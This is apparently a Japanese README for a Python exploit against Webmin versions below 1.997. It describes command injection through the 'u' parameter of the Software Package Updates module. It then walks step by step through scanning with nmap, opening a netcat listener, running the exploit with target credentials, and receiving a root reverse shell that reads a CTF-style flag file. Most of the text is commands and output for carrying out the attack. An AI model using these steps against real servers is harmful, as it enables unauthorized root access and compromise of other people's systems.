
Webmin < 1.997のソフトウェアパッケージ更新モジュールを介した認証済みリモートコード実行エクスプロイト。サニタイズされていないパラメータを介してrootとして任意のコマンドを注入し、リバースシェルを配信します。
Webmin バージョン 1.997 未満における Remote Code Execution の脆弱性のための Exploit。Software Package Updates モジュールを介して。
Webmin の Software Package Updates モジュールは、パラメータ u をシステムに渡す前に適切にサニタイズしません。そのモジュールにアクセスできる認証済みユーザーは、root として実行される任意のコマンドを注入できます。
Exploit を実行する前に依存関係をインストールしてください:
pip3 install requests beautifulsoup4 lxml urllib3
| パラメータ | 説明 | 例 |
|---|---|---|
-t | ターゲットのURL(ポートなし) | https://192.168.1.10 |
-u | Webminのユーザー | admin |
-p | Webminのパスワード | password123 |
-l | あなたのIP(シェルを受け取る場所) | 192.168.1.5 |
-lp | リスニングポート | 4444 |
1 — Nmap でターゲットのIPを特定します:
nmap -sV TARGET_IP
# Busca el puerto 10000 con Webmin
2 — あなたのマシンでリスナーを開きます:
nc -lvnp 4444
3 — 別のターミナルでexploitを実行します:
python3 exploit.py \
-t https://TARGET_IP \
-u admin \
-p PASSWORD \
-l TU_IP \
-lp 4444
4 — Exploitが成功すると、次のように表示されます:
5 — リスナーで root としてシェルを受け取ります:
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}
# Terminal 1
nc -lvnp 4444
# Terminal 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444